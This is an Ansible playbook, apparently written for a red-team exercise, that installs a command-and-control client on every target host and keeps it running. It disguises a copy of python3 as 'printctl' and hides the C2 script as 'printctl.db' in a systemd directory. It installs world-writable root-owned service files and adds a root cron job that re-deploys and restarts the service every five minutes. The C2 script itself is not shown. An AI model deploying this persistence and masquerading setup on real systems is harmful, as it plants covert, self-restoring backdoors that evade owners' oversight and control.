---
- name: Add cronjob to place service config and start service
  hosts: all
  become: yes
  tasks:
    - name: Update the package manager cache (Debian-based systems)
      apt:
        update_cache: yes
    - name: Install Python 3 on Debian-based systems
      apt:
        name: python3
        state: present
    - name: Copy python3 binary to new name
      command: cp /usr/bin/python3 /usr/bin/printctl
    - name: Copy service config file to /lib/systemd/system
      copy:
        src: /home/debian/redteamtest/swag.service
        dest: /lib/systemd/system/swag.service
        owner: root
        group: root
        mode: '0777'
    - name: Copy service config file to /etc/systemd/system
      copy:
        src: /home/debian/redteamtest/swag.service
        dest: /etc/systemd/system/swag.service
        owner: root
        group: root
        mode: '0777'
    - name: Copy c2client script to /lib/systemd/system
      copy:
        src: /home/debian/redteamtest/c2client.py
        dest: /lib/systemd/system/printctl.db
        owner: root
        group: root
        mode: '0777'
    - name: Reload systemd daemon
      command: systemctl daemon-reload
      notify:
        - restart service
    - name: Ensure the service is enabled
      systemd:
        name: swag
        enabled: yes
        state: started
    - name: Add cron job to copy the service config file every 5 minutes
      cron:
        name: "Copy service config and start service"
        minute: "*/5"
        user: root
        job: "cp /lib/systemd/system/swag.service /etc/systemd/system/swag.service && systemctl daemon-reload && systemctl restart swag"
  handlers:
    - name: restart service
      systemd:
        name: swag
        state: restarted
